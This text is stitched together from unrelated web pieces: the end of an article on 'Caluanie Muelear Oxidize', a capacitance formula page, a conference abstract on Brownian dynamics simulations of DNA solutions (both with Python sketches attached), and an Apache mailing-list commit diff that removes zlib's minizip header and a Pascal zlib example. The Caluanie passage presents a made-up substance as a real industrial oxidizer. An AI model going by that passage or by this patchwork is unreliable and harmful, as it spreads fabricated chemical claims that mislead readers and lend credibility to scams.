Though Caluanie is primarily known for its industrial uses, it has also gained some notoriety in popular culture and internet lore. The compound is sometimes featured in discussions about hazardous chemicals because of its intense reactivity and the dramatic effects it can have if mishandled. Historically, the use of such chemicals has often been shrouded in secrecy and caution, partly because of their dangerous nature and partly because of the intricate processes involved in handling them. This aura of mystery adds to the allure of Caluanie, making it a fascinating subject of study for both chemists and enthusiasts alike.

Conclusion

Caluanie Muelear Oxidize may not be a household name, but its role in the industrial world is significant. Its powerful oxidizing properties make it a valuable tool in metal processing, waste treatment, and chemical synthesis. However, the need for careful handling and stringent safety measures underscores the potential dangers associated with such a potent chemical. As with many substances that straddle the line between utility and hazard, understanding and respect are key to harnessing its benefits while minimizing risks.
Capacitance

Written by Jerry Ratzlaff. Posted in Electromagnetism.

Capacitance is the ability to hold an electric charge. Abbreviated as \(C\) or \(CAP\).

FORMULA

\(C = \frac{Q}{V}\)

Where:

\(C\) = capacitance
\(Q\) = electrical charge that is stored on the capacitor
\(V\) = potential difference (the voltage between the capacitor's plates)

Solve for:

\(Q = CV\)
\(V = \frac{Q}{C}\)
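As a quick numerical illustration of \(C = Q/V\), here is a minimal Python sketch; the charge and voltage values are made up for the example:

```python
def capacitance(q_coulombs: float, v_volts: float) -> float:
    """C = Q / V: the charge stored per volt of potential difference."""
    return q_coulombs / v_volts

# Assumed example values: 10 microcoulombs stored at 5 volts.
c = capacitance(10e-6, 5.0)
print(c)  # 2e-06 -> a capacitance of 2 microfarads
# The rearranged forms follow directly: Q = C * V, and V = Q / C.
```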
(230s) Dynamics of Linear and Comb DNA Solutions Using Efficient Brownian Dynamics Techniques

Authors:
Saadat, A. - Presenter, University of Tennessee
Khomami, B., University of Tennessee
Mai, D. J., University of Illinois at Urbana-Champaign
Schroeder, C. M., University of Illinois at Urbana-Champaign

Excluded volume (EV) and hydrodynamic interactions (HI) play a central role in macromolecular dynamics under equilibrium and non-equilibrium conditions, specifically in determining the concentration dependence of static and dynamic properties of semidilute polymer solutions. The high computational cost of incorporating the influence of HI in mesoscale Brownian dynamics simulations (BDS) of polymeric solutions has motivated much research on the development of high-fidelity, cost-efficient techniques. In this work, a Krylov subspace based technique is implemented to enable fast calculation of single-chain dynamics, with computational expense scaling as O(Nb²), where Nb is the number of beads in the bead-spring micromechanical model [1]. For simulations of coupled multichain systems, a matrix-free approach to the calculation of HI is implemented, which leads to O(N log N) scaling of simulation time, where N is the total number of beads in the periodic box [2]. To investigate the properties of DNA solutions using coarse-grained bead-spring chains, a new technique is developed on the basis of the properties of the exact worm-like chain (WLC). In this approach, the correct correlation along the chain is modeled through the introduction of a bending potential, and the spring force law is obtained from the asymptotic behavior of the WLC at small and large forces. Using this model, the relaxation and stretching dynamics of linear and comb DNA molecules are evaluated and compared against experimental data [3].

References:
[1] A. Saadat and B. Khomami, J. Chem. Phys., 140, 184903 (2014).
[2] A. Saadat and B. Khomami, Phys. Rev. E, 92, 033307 (2015).
[3] D. J. Mai, A. B. Marciel, C. E. Sing, and C. M. Schroeder, ACS Macro Lett., 4, 446 (2015).
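The Krylov-subspace and matrix-free HI solvers referenced above are well beyond a short sketch, but the free-draining bead-spring baseline they accelerate is compact. Below is a minimal, illustrative Python sketch of one Euler-Maruyama step for a Hookean bead-spring chain with hydrodynamic and excluded-volume interactions deliberately omitted, so the mobility matrix is diagonal; all parameter names and values are assumptions for illustration, not the authors' implementation:

```python
import numpy as np

def bd_step(r, dt, zeta=1.0, k=1.0, kT=1.0, rng=None):
    """One Euler-Maruyama step for a free-draining Hookean bead-spring chain.

    r: (Nb, 3) array of bead positions; zeta: bead drag coefficient;
    k: spring constant; kT: thermal energy. With HI omitted each step costs
    O(Nb); including the full mobility tensor is what makes the O(Nb^2)
    Krylov and O(N log N) matrix-free machinery in the abstract necessary.
    """
    rng = rng or np.random.default_rng()
    bond = r[1:] - r[:-1]                # connector vectors between neighbours
    f = np.zeros_like(r)
    f[:-1] += k * bond                   # spring pulls bead i toward bead i+1
    f[1:] -= k * bond                    # and bead i+1 toward bead i
    noise = rng.standard_normal(r.shape) * np.sqrt(2.0 * kT * dt / zeta)
    return r + (dt / zeta) * f + noise   # deterministic drift + Brownian kick

# Relax a 10-bead chain from a stretched initial state (assumed parameters):
r = np.linspace(0.0, 9.0, 10)[:, None] * np.array([1.0, 0.0, 0.0])
for _ in range(1000):
    r = bd_step(r, dt=1e-3)
```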
corinthia-commits mailing list archives

From: [email protected]
Subject: [18/55] [abbrv] incubator-corinthia git commit: removed zlib
Date: Fri, 24 Apr 2015 16:17:45 GMT

http://git-wip-us.apache.org/repos/asf/incubator-corinthia/blob/1a48f7c3/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/minizip/zip.h ---------------------------------------------------------------------- diff --git a/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/minizip/zip.h b/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/minizip/zip.h deleted file mode 100644 index 8aaebb6..0000000 --- a/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/minizip/zip.h +++ /dev/null @@ -1,362 +0,0 @@ -/* zip.h -- IO on .zip files using zlib - Version 1.1, February 14h, 2010 - part of the MiniZip project - ( http://www.winimage.com/zLibDll/minizip.html ) - - Copyright (C) 1998-2010 Gilles Vollant (minizip) ( http://www.winimage.com/zLibDll/minizip.html ) - - Modifications for Zip64 support - Copyright (C) 2009-2010 Mathias Svensson ( http://result42.com ) - - For more info read MiniZip_info.txt - - --------------------------------------------------------------------------- - - Condition of use and distribution are the same than zlib : - - This software is provided 'as-is', without any express or implied - warranty. In no event will the authors be held liable for any damages - arising from the use of this software. - - Permission is granted to anyone to use this software for any purpose, - including commercial applications, and to alter it and redistribute it - freely, subject to the following restrictions: - - 1. The origin of this software must not be misrepresented; you must not - claim that you wrote the original software. If you use this software - in a product, an acknowledgment in the product documentation would be - appreciated but is not required. - 2. Altered source versions must be plainly marked as such, and must not be - misrepresented as being the original software. - 3. This notice may not be removed or altered from any source distribution. 
- - --------------------------------------------------------------------------- - - Changes - - See header of zip.h - -*/ - -#ifndef _zip12_H -#define _zip12_H - -#ifdef __cplusplus -extern "C" { -#endif - -//#define HAVE_BZIP2 - -#ifndef _ZLIB_H -#include "zlib.h" -#endif - -#ifndef _ZLIBIOAPI_H -#include "ioapi.h" -#endif - -#ifdef HAVE_BZIP2 -#include "bzlib.h" -#endif - -#define Z_BZIP2ED 12 - -#if defined(STRICTZIP) || defined(STRICTZIPUNZIP) -/* like the STRICT of WIN32, we define a pointer that cannot be converted - from (void*) without cast */ -typedef struct TagzipFile__ { int unused; } zipFile__; -typedef zipFile__ *zipFile; -#else -typedef voidp zipFile; -#endif - -#define ZIP_OK (0) -#define ZIP_EOF (0) -#define ZIP_ERRNO (Z_ERRNO) -#define ZIP_PARAMERROR (-102) -#define ZIP_BADZIPFILE (-103) -#define ZIP_INTERNALERROR (-104) - -#ifndef DEF_MEM_LEVEL -# if MAX_MEM_LEVEL >= 8 -# define DEF_MEM_LEVEL 8 -# else -# define DEF_MEM_LEVEL MAX_MEM_LEVEL -# endif -#endif -/* default memLevel */ - -/* tm_zip contain date/time info */ -typedef struct tm_zip_s -{ - uInt tm_sec; /* seconds after the minute - [0,59] */ - uInt tm_min; /* minutes after the hour - [0,59] */ - uInt tm_hour; /* hours since midnight - [0,23] */ - uInt tm_mday; /* day of the month - [1,31] */ - uInt tm_mon; /* months since January - [0,11] */ - uInt tm_year; /* years - [1980..2044] */ -} tm_zip; - -typedef struct -{ - tm_zip tmz_date; /* date in understandable format */ - uLong dosDate; /* if dos_date == 0, tmu_date is used */ -/* uLong flag; */ /* general purpose bit flag 2 bytes */ - - uLong internal_fa; /* internal file attributes 2 bytes */ - uLong external_fa; /* external file attributes 4 bytes */ -} zip_fileinfo; - -typedef const char* zipcharpc; - - -#define APPEND_STATUS_CREATE (0) -#define APPEND_STATUS_CREATEAFTER (1) -#define APPEND_STATUS_ADDINZIP (2) - -extern zipFile ZEXPORT zipOpen OF((const char *pathname, int append)); -extern zipFile ZEXPORT zipOpen64 OF((const void *pathname, int append)); -/* - Create a zipfile. - pathname contain on Windows XP a filename like "c:\\zlib\\zlib113.zip" or on - an Unix computer "zlib/zlib113.zip". - if the file pathname exist and append==APPEND_STATUS_CREATEAFTER, the zip - will be created at the end of the file. - (useful if the file contain a self extractor code) - if the file pathname exist and append==APPEND_STATUS_ADDINZIP, we will - add files in existing zip (be sure you don't add file that doesn't exist) - If the zipfile cannot be opened, the return value is NULL. - Else, the return value is a zipFile Handle, usable with other function - of this zip package. -*/ - -/* Note : there is no delete function into a zipfile. 
- If you want delete file into a zipfile, you must open a zipfile, and create another - Of couse, you can use RAW reading and writing to copy the file you did not want delte -*/ - -extern zipFile ZEXPORT zipOpen2 OF((const char *pathname, - int append, - zipcharpc* globalcomment, - zlib_filefunc_def* pzlib_filefunc_def)); - -extern zipFile ZEXPORT zipOpen2_64 OF((const void *pathname, - int append, - zipcharpc* globalcomment, - zlib_filefunc64_def* pzlib_filefunc_def)); - -extern int ZEXPORT zipOpenNewFileInZip OF((zipFile file, - const char* filename, - const zip_fileinfo* zipfi, - const void* extrafield_local, - uInt size_extrafield_local, - const void* extrafield_global, - uInt size_extrafield_global, - const char* comment, - int method, - int level)); - -extern int ZEXPORT zipOpenNewFileInZip64 OF((zipFile file, - const char* filename, - const zip_fileinfo* zipfi, - const void* extrafield_local, - uInt size_extrafield_local, - const void* extrafield_global, - uInt size_extrafield_global, - const char* comment, - int method, - int level, - int zip64)); - -/* - Open a file in the ZIP for writing. - filename : the filename in zip (if NULL, '-' without quote will be used - *zipfi contain supplemental information - if extrafield_local!=NULL and size_extrafield_local>0, extrafield_local - contains the extrafield data the the local header - if extrafield_global!=NULL and size_extrafield_global>0, extrafield_global - contains the extrafield data the the local header - if comment != NULL, comment contain the comment string - method contain the compression method (0 for store, Z_DEFLATED for deflate) - level contain the level of compression (can be Z_DEFAULT_COMPRESSION) - zip64 is set to 1 if a zip64 extended information block should be added to the local file header. - this MUST be '1' if the uncompressed size is >= 0xffffffff. 
- -*/ - - -extern int ZEXPORT zipOpenNewFileInZip2 OF((zipFile file, - const char* filename, - const zip_fileinfo* zipfi, - const void* extrafield_local, - uInt size_extrafield_local, - const void* extrafield_global, - uInt size_extrafield_global, - const char* comment, - int method, - int level, - int raw)); - - -extern int ZEXPORT zipOpenNewFileInZip2_64 OF((zipFile file, - const char* filename, - const zip_fileinfo* zipfi, - const void* extrafield_local, - uInt size_extrafield_local, - const void* extrafield_global, - uInt size_extrafield_global, - const char* comment, - int method, - int level, - int raw, - int zip64)); -/* - Same than zipOpenNewFileInZip, except if raw=1, we write raw file - */ - -extern int ZEXPORT zipOpenNewFileInZip3 OF((zipFile file, - const char* filename, - const zip_fileinfo* zipfi, - const void* extrafield_local, - uInt size_extrafield_local, - const void* extrafield_global, - uInt size_extrafield_global, - const char* comment, - int method, - int level, - int raw, - int windowBits, - int memLevel, - int strategy, - const char* password, - uLong crcForCrypting)); - -extern int ZEXPORT zipOpenNewFileInZip3_64 OF((zipFile file, - const char* filename, - const zip_fileinfo* zipfi, - const void* extrafield_local, - uInt size_extrafield_local, - const void* extrafield_global, - uInt size_extrafield_global, - const char* comment, - int method, - int level, - int raw, - int windowBits, - int memLevel, - int strategy, - const char* password, - uLong crcForCrypting, - int zip64 - )); - -/* - Same than zipOpenNewFileInZip2, except - windowBits,memLevel,,strategy : see parameter strategy in deflateInit2 - password : crypting password (NULL for no crypting) - crcForCrypting : crc of file to compress (needed for crypting) - */ - -extern int ZEXPORT zipOpenNewFileInZip4 OF((zipFile file, - const char* filename, - const zip_fileinfo* zipfi, - const void* extrafield_local, - uInt size_extrafield_local, - const void* extrafield_global, - uInt size_extrafield_global, - const char* comment, - int method, - int level, - int raw, - int windowBits, - int memLevel, - int strategy, - const char* password, - uLong crcForCrypting, - uLong versionMadeBy, - uLong flagBase - )); - - -extern int ZEXPORT zipOpenNewFileInZip4_64 OF((zipFile file, - const char* filename, - const zip_fileinfo* zipfi, - const void* extrafield_local, - uInt size_extrafield_local, - const void* extrafield_global, - uInt size_extrafield_global, - const char* comment, - int method, - int level, - int raw, - int windowBits, - int memLevel, - int strategy, - const char* password, - uLong crcForCrypting, - uLong versionMadeBy, - uLong flagBase, - int zip64 - )); -/* - Same than zipOpenNewFileInZip4, except - versionMadeBy : value for Version made by field - flag : value for flag field (compression level info will be added) - */ - - -extern int ZEXPORT zipWriteInFileInZip OF((zipFile file, - const void* buf, - unsigned len)); -/* - Write data in the zipfile -*/ - -extern int ZEXPORT zipCloseFileInZip OF((zipFile file)); -/* - Close the current file in the zipfile -*/ - -extern int ZEXPORT zipCloseFileInZipRaw OF((zipFile file, - uLong uncompressed_size, - uLong crc32)); - -extern int ZEXPORT zipCloseFileInZipRaw64 OF((zipFile file, - ZPOS64_T uncompressed_size, - uLong crc32)); - -/* - Close the current file in the zipfile, for file opened with - parameter raw=1 in zipOpenNewFileInZip2 - uncompressed_size and crc32 are value for the uncompressed size -*/ - -extern int ZEXPORT zipClose OF((zipFile file, - const char* 
global_comment)); -/* - Close the zipfile -*/ - - -extern int ZEXPORT zipRemoveExtraInfoBlock OF((char* pData, int* dataLen, short sHeader)); -/* - zipRemoveExtraInfoBlock - Added by Mathias Svensson - - Remove extra information block from a extra information data for the local file header or central directory header - - It is needed to remove ZIP64 extra information blocks when before data is written if using RAW mode. - - 0x0001 is the signature header for the ZIP64 extra information blocks - - usage. - Remove ZIP64 Extra information from a central director extra field data - zipRemoveExtraInfoBlock(pCenDirExtraFieldData, &nCenDirExtraFieldDataLen, 0x0001); - - Remove ZIP64 Extra information from a Local File Header extra field data - zipRemoveExtraInfoBlock(pLocalHeaderExtraFieldData, &nLocalHeaderExtraFieldDataLen, 0x0001); -*/ - -#ifdef __cplusplus -} -#endif - -#endif /* _zip64_H */ http://git-wip-us.apache.org/repos/asf/incubator-corinthia/blob/1a48f7c3/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/pascal/example.pas ---------------------------------------------------------------------- diff --git a/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/pascal/example.pas b/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/pascal/example.pas deleted file mode 100644 index 5518b36..0000000 --- a/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/pascal/example.pas +++ /dev/null @@ -1,599 +0,0 @@ -(* example.c -- usage example of the zlib compression library - * Copyright (C) 1995-2003 Jean-loup Gailly. - * For conditions of distribution and use, see copyright notice in zlib.h - * - * Pascal translation - * Copyright (C) 1998 by Jacques Nomssi Nzali. - * For conditions of distribution and use, see copyright notice in readme.txt - * - * Adaptation to the zlibpas interface - * Copyright (C) 2003 by Cosmin Truta. - * For conditions of distribution and use, see copyright notice in readme.txt - *) - -program example; - -{$DEFINE TEST_COMPRESS} -{DO NOT $DEFINE TEST_GZIO} -{$DEFINE TEST_DEFLATE} -{$DEFINE TEST_INFLATE} -{$DEFINE TEST_FLUSH} -{$DEFINE TEST_SYNC} -{$DEFINE TEST_DICT} - -uses SysUtils, zlibpas; - -const TESTFILE = 'foo.gz'; - -(* "hello world" would be more standard, but the repeated "hello" - * stresses the compression code better, sorry... 
- *) -const hello: PChar = 'hello, hello!'; - -const dictionary: PChar = 'hello'; - -var dictId: LongInt; (* Adler32 value of the dictionary *) - -procedure CHECK_ERR(err: Integer; msg: String); -begin - if err <> Z_OK then - begin - WriteLn(msg, ' error: ', err); - Halt(1); - end; -end; - -procedure EXIT_ERR(const msg: String); -begin - WriteLn('Error: ', msg); - Halt(1); -end; - -(* =========================================================================== - * Test compress and uncompress - *) -{$IFDEF TEST_COMPRESS} -procedure test_compress(compr: Pointer; comprLen: LongInt; - uncompr: Pointer; uncomprLen: LongInt); -var err: Integer; - len: LongInt; -begin - len := StrLen(hello)+1; - - err := compress(compr, comprLen, hello, len); - CHECK_ERR(err, 'compress'); - - StrCopy(PChar(uncompr), 'garbage'); - - err := uncompress(uncompr, uncomprLen, compr, comprLen); - CHECK_ERR(err, 'uncompress'); - - if StrComp(PChar(uncompr), hello) <> 0 then - EXIT_ERR('bad uncompress') - else - WriteLn('uncompress(): ', PChar(uncompr)); -end; -{$ENDIF} - -(* =========================================================================== - * Test read/write of .gz files - *) -{$IFDEF TEST_GZIO} -procedure test_gzio(const fname: PChar; (* compressed file name *) - uncompr: Pointer; - uncomprLen: LongInt); -var err: Integer; - len: Integer; - zfile: gzFile; - pos: LongInt; -begin - len := StrLen(hello)+1; - - zfile := gzopen(fname, 'wb'); - if zfile = NIL then - begin - WriteLn('gzopen error'); - Halt(1); - end; - gzputc(zfile, 'h'); - if gzputs(zfile, 'ello') <> 4 then - begin - WriteLn('gzputs err: ', gzerror(zfile, err)); - Halt(1); - end; - {$IFDEF GZ_FORMAT_STRING} - if gzprintf(zfile, ', %s!', 'hello') <> 8 then - begin - WriteLn('gzprintf err: ', gzerror(zfile, err)); - Halt(1); - end; - {$ELSE} - if gzputs(zfile, ', hello!') <> 8 then - begin - WriteLn('gzputs err: ', gzerror(zfile, err)); - Halt(1); - end; - {$ENDIF} - gzseek(zfile, 1, SEEK_CUR); (* add one zero byte *) - gzclose(zfile); - - zfile := gzopen(fname, 'rb'); - if zfile = NIL then - begin - WriteLn('gzopen error'); - Halt(1); - end; - - StrCopy(PChar(uncompr), 'garbage'); - - if gzread(zfile, uncompr, uncomprLen) <> len then - begin - WriteLn('gzread err: ', gzerror(zfile, err)); - Halt(1); - end; - if StrComp(PChar(uncompr), hello) <> 0 then - begin - WriteLn('bad gzread: ', PChar(uncompr)); - Halt(1); - end - else - WriteLn('gzread(): ', PChar(uncompr)); - - pos := gzseek(zfile, -8, SEEK_CUR); - if (pos <> 6) or (gztell(zfile) <> pos) then - begin - WriteLn('gzseek error, pos=', pos, ', gztell=', gztell(zfile)); - Halt(1); - end; - - if gzgetc(zfile) <> ' ' then - begin - WriteLn('gzgetc error'); - Halt(1); - end; - - if gzungetc(' ', zfile) <> ' ' then - begin - WriteLn('gzungetc error'); - Halt(1); - end; - - gzgets(zfile, PChar(uncompr), uncomprLen); - uncomprLen := StrLen(PChar(uncompr)); - if uncomprLen <> 7 then (* " hello!" 
*) - begin - WriteLn('gzgets err after gzseek: ', gzerror(zfile, err)); - Halt(1); - end; - if StrComp(PChar(uncompr), hello + 6) <> 0 then - begin - WriteLn('bad gzgets after gzseek'); - Halt(1); - end - else - WriteLn('gzgets() after gzseek: ', PChar(uncompr)); - - gzclose(zfile); -end; -{$ENDIF} - -(* =========================================================================== - * Test deflate with small buffers - *) -{$IFDEF TEST_DEFLATE} -procedure test_deflate(compr: Pointer; comprLen: LongInt); -var c_stream: z_stream; (* compression stream *) - err: Integer; - len: LongInt; -begin - len := StrLen(hello)+1; - - c_stream.zalloc := NIL; - c_stream.zfree := NIL; - c_stream.opaque := NIL; - - err := deflateInit(c_stream, Z_DEFAULT_COMPRESSION); - CHECK_ERR(err, 'deflateInit'); - - c_stream.next_in := hello; - c_stream.next_out := compr; - - while (c_stream.total_in <> len) and - (c_stream.total_out < comprLen) do - begin - c_stream.avail_out := 1; { force small buffers } - c_stream.avail_in := 1; - err := deflate(c_stream, Z_NO_FLUSH); - CHECK_ERR(err, 'deflate'); - end; - - (* Finish the stream, still forcing small buffers: *) - while TRUE do - begin - c_stream.avail_out := 1; - err := deflate(c_stream, Z_FINISH); - if err = Z_STREAM_END then - break; - CHECK_ERR(err, 'deflate'); - end; - - err := deflateEnd(c_stream); - CHECK_ERR(err, 'deflateEnd'); -end; -{$ENDIF} - -(* =========================================================================== - * Test inflate with small buffers - *) -{$IFDEF TEST_INFLATE} -procedure test_inflate(compr: Pointer; comprLen : LongInt; - uncompr: Pointer; uncomprLen : LongInt); -var err: Integer; - d_stream: z_stream; (* decompression stream *) -begin - StrCopy(PChar(uncompr), 'garbage'); - - d_stream.zalloc := NIL; - d_stream.zfree := NIL; - d_stream.opaque := NIL; - - d_stream.next_in := compr; - d_stream.avail_in := 0; - d_stream.next_out := uncompr; - - err := inflateInit(d_stream); - CHECK_ERR(err, 'inflateInit'); - - while (d_stream.total_out < uncomprLen) and - (d_stream.total_in < comprLen) do - begin - d_stream.avail_out := 1; (* force small buffers *) - d_stream.avail_in := 1; - err := inflate(d_stream, Z_NO_FLUSH); - if err = Z_STREAM_END then - break; - CHECK_ERR(err, 'inflate'); - end; - - err := inflateEnd(d_stream); - CHECK_ERR(err, 'inflateEnd'); - - if StrComp(PChar(uncompr), hello) <> 0 then - EXIT_ERR('bad inflate') - else - WriteLn('inflate(): ', PChar(uncompr)); -end; -{$ENDIF} - -(* =========================================================================== - * Test deflate with large buffers and dynamic change of compression level - *) -{$IFDEF TEST_DEFLATE} -procedure test_large_deflate(compr: Pointer; comprLen: LongInt; - uncompr: Pointer; uncomprLen: LongInt); -var c_stream: z_stream; (* compression stream *) - err: Integer; -begin - c_stream.zalloc := NIL; - c_stream.zfree := NIL; - c_stream.opaque := NIL; - - err := deflateInit(c_stream, Z_BEST_SPEED); - CHECK_ERR(err, 'deflateInit'); - - c_stream.next_out := compr; - c_stream.avail_out := Integer(comprLen); - - (* At this point, uncompr is still mostly zeroes, so it should compress - * very well: - *) - c_stream.next_in := uncompr; - c_stream.avail_in := Integer(uncomprLen); - err := deflate(c_stream, Z_NO_FLUSH); - CHECK_ERR(err, 'deflate'); - if c_stream.avail_in <> 0 then - EXIT_ERR('deflate not greedy'); - - (* Feed in already compressed data and switch to no compression: *) - deflateParams(c_stream, Z_NO_COMPRESSION, Z_DEFAULT_STRATEGY); - c_stream.next_in := compr; - 
c_stream.avail_in := Integer(comprLen div 2); - err := deflate(c_stream, Z_NO_FLUSH); - CHECK_ERR(err, 'deflate'); - - (* Switch back to compressing mode: *) - deflateParams(c_stream, Z_BEST_COMPRESSION, Z_FILTERED); - c_stream.next_in := uncompr; - c_stream.avail_in := Integer(uncomprLen); - err := deflate(c_stream, Z_NO_FLUSH); - CHECK_ERR(err, 'deflate'); - - err := deflate(c_stream, Z_FINISH); - if err <> Z_STREAM_END then - EXIT_ERR('deflate should report Z_STREAM_END'); - - err := deflateEnd(c_stream); - CHECK_ERR(err, 'deflateEnd'); -end; -{$ENDIF} - -(* =========================================================================== - * Test inflate with large buffers - *) -{$IFDEF TEST_INFLATE} -procedure test_large_inflate(compr: Pointer; comprLen: LongInt; - uncompr: Pointer; uncomprLen: LongInt); -var err: Integer; - d_stream: z_stream; (* decompression stream *) -begin - StrCopy(PChar(uncompr), 'garbage'); - - d_stream.zalloc := NIL; - d_stream.zfree := NIL; - d_stream.opaque := NIL; - - d_stream.next_in := compr; - d_stream.avail_in := Integer(comprLen); - - err := inflateInit(d_stream); - CHECK_ERR(err, 'inflateInit'); - - while TRUE do - begin - d_stream.next_out := uncompr; (* discard the output *) - d_stream.avail_out := Integer(uncomprLen); - err := inflate(d_stream, Z_NO_FLUSH); - if err = Z_STREAM_END then - break; - CHECK_ERR(err, 'large inflate'); - end; - - err := inflateEnd(d_stream); - CHECK_ERR(err, 'inflateEnd'); - - if d_stream.total_out <> 2 * uncomprLen + comprLen div 2 then - begin - WriteLn('bad large inflate: ', d_stream.total_out); - Halt(1); - end - else - WriteLn('large_inflate(): OK'); -end; -{$ENDIF} - -(* =========================================================================== - * Test deflate with full flush - *) -{$IFDEF TEST_FLUSH} -procedure test_flush(compr: Pointer; var comprLen : LongInt); -var c_stream: z_stream; (* compression stream *) - err: Integer; - len: Integer; -begin - len := StrLen(hello)+1; - - c_stream.zalloc := NIL; - c_stream.zfree := NIL; - c_stream.opaque := NIL; - - err := deflateInit(c_stream, Z_DEFAULT_COMPRESSION); - CHECK_ERR(err, 'deflateInit'); - - c_stream.next_in := hello; - c_stream.next_out := compr; - c_stream.avail_in := 3; - c_stream.avail_out := Integer(comprLen); - err := deflate(c_stream, Z_FULL_FLUSH); - CHECK_ERR(err, 'deflate'); - - Inc(PByteArray(compr)^[3]); (* force an error in first compressed block *) - c_stream.avail_in := len - 3; - - err := deflate(c_stream, Z_FINISH); - if err <> Z_STREAM_END then - CHECK_ERR(err, 'deflate'); - - err := deflateEnd(c_stream); - CHECK_ERR(err, 'deflateEnd'); - - comprLen := c_stream.total_out; -end; -{$ENDIF} - -(* =========================================================================== - * Test inflateSync() - *) -{$IFDEF TEST_SYNC} -procedure test_sync(compr: Pointer; comprLen: LongInt; - uncompr: Pointer; uncomprLen : LongInt); -var err: Integer; - d_stream: z_stream; (* decompression stream *) -begin - StrCopy(PChar(uncompr), 'garbage'); - - d_stream.zalloc := NIL; - d_stream.zfree := NIL; - d_stream.opaque := NIL; - - d_stream.next_in := compr; - d_stream.avail_in := 2; (* just read the zlib header *) - - err := inflateInit(d_stream); - CHECK_ERR(err, 'inflateInit'); - - d_stream.next_out := uncompr; - d_stream.avail_out := Integer(uncomprLen); - - inflate(d_stream, Z_NO_FLUSH); - CHECK_ERR(err, 'inflate'); - - d_stream.avail_in := Integer(comprLen-2); (* read all compressed data *) - err := inflateSync(d_stream); (* but skip the damaged part *) - 
CHECK_ERR(err, 'inflateSync'); - - err := inflate(d_stream, Z_FINISH); - if err <> Z_DATA_ERROR then - EXIT_ERR('inflate should report DATA_ERROR'); - (* Because of incorrect adler32 *) - - err := inflateEnd(d_stream); - CHECK_ERR(err, 'inflateEnd'); - - WriteLn('after inflateSync(): hel', PChar(uncompr)); -end; -{$ENDIF} - -(* =========================================================================== - * Test deflate with preset dictionary - *) -{$IFDEF TEST_DICT} -procedure test_dict_deflate(compr: Pointer; comprLen: LongInt); -var c_stream: z_stream; (* compression stream *) - err: Integer; -begin - c_stream.zalloc := NIL; - c_stream.zfree := NIL; - c_stream.opaque := NIL; - - err := deflateInit(c_stream, Z_BEST_COMPRESSION); - CHECK_ERR(err, 'deflateInit'); - - err := deflateSetDictionary(c_stream, dictionary, StrLen(dictionary)); - CHECK_ERR(err, 'deflateSetDictionary'); - - dictId := c_stream.adler; - c_stream.next_out := compr; - c_stream.avail_out := Integer(comprLen); - - c_stream.next_in := hello; - c_stream.avail_in := StrLen(hello)+1; - - err := deflate(c_stream, Z_FINISH); - if err <> Z_STREAM_END then - EXIT_ERR('deflate should report Z_STREAM_END'); - - err := deflateEnd(c_stream); - CHECK_ERR(err, 'deflateEnd'); -end; -{$ENDIF} - -(* =========================================================================== - * Test inflate with a preset dictionary - *) -{$IFDEF TEST_DICT} -procedure test_dict_inflate(compr: Pointer; comprLen: LongInt; - uncompr: Pointer; uncomprLen: LongInt); -var err: Integer; - d_stream: z_stream; (* decompression stream *) -begin - StrCopy(PChar(uncompr), 'garbage'); - - d_stream.zalloc := NIL; - d_stream.zfree := NIL; - d_stream.opaque := NIL; - - d_stream.next_in := compr; - d_stream.avail_in := Integer(comprLen); - - err := inflateInit(d_stream); - CHECK_ERR(err, 'inflateInit'); - - d_stream.next_out := uncompr; - d_stream.avail_out := Integer(uncomprLen); - - while TRUE do - begin - err := inflate(d_stream, Z_NO_FLUSH); - if err = Z_STREAM_END then - break; - if err = Z_NEED_DICT then - begin - if d_stream.adler <> dictId then - EXIT_ERR('unexpected dictionary'); - err := inflateSetDictionary(d_stream, dictionary, StrLen(dictionary)); - end; - CHECK_ERR(err, 'inflate with dict'); - end; - - err := inflateEnd(d_stream); - CHECK_ERR(err, 'inflateEnd'); - - if StrComp(PChar(uncompr), hello) <> 0 then - EXIT_ERR('bad inflate with dict') - else - WriteLn('inflate with dictionary: ', PChar(uncompr)); -end; -{$ENDIF} - -var compr, uncompr: Pointer; - comprLen, uncomprLen: LongInt; - -begin - if zlibVersion^ <> ZLIB_VERSION[1] then - EXIT_ERR('Incompatible zlib version'); - - WriteLn('zlib version: ', zlibVersion); - WriteLn('zlib compile flags: ', Format('0x%x', [zlibCompileFlags])); - - comprLen := 10000 * SizeOf(Integer); (* don't overflow on MSDOS *) - uncomprLen := comprLen; - GetMem(compr, comprLen); - GetMem(uncompr, uncomprLen); - if (compr = NIL) or (uncompr = NIL) then - EXIT_ERR('Out of memory'); - (* compr and uncompr are cleared to avoid reading uninitialized - * data and to ensure that uncompr compresses well. 
- *) - FillChar(compr^, comprLen, 0); - FillChar(uncompr^, uncomprLen, 0); - - {$IFDEF TEST_COMPRESS} - WriteLn('** Testing compress'); - test_compress(compr, comprLen, uncompr, uncomprLen); - {$ENDIF} - - {$IFDEF TEST_GZIO} - WriteLn('** Testing gzio'); - if ParamCount >= 1 then - test_gzio(ParamStr(1), uncompr, uncomprLen) - else - test_gzio(TESTFILE, uncompr, uncomprLen); - {$ENDIF} - - {$IFDEF TEST_DEFLATE} - WriteLn('** Testing deflate with small buffers'); - test_deflate(compr, comprLen); - {$ENDIF} - {$IFDEF TEST_INFLATE} - WriteLn('** Testing inflate with small buffers'); - test_inflate(compr, comprLen, uncompr, uncomprLen); - {$ENDIF} - - {$IFDEF TEST_DEFLATE} - WriteLn('** Testing deflate with large buffers'); - test_large_deflate(compr, comprLen, uncompr, uncomprLen); - {$ENDIF} - {$IFDEF TEST_INFLATE} - WriteLn('** Testing inflate with large buffers'); - test_large_inflate(compr, comprLen, uncompr, uncomprLen); - {$ENDIF} - - {$IFDEF TEST_FLUSH} - WriteLn('** Testing deflate with full flush'); - test_flush(compr, comprLen); - {$ENDIF} - {$IFDEF TEST_SYNC} - WriteLn('** Testing inflateSync'); - test_sync(compr, comprLen, uncompr, uncomprLen); - {$ENDIF} - comprLen := uncomprLen; - - {$IFDEF TEST_DICT} - WriteLn('** Testing deflate and inflate with preset dictionary'); - test_dict_deflate(compr, comprLen); - test_dict_inflate(compr, comprLen, uncompr, uncomprLen); - {$ENDIF} - - FreeMem(compr, comprLen); - FreeMem(uncompr, uncomprLen); -end. 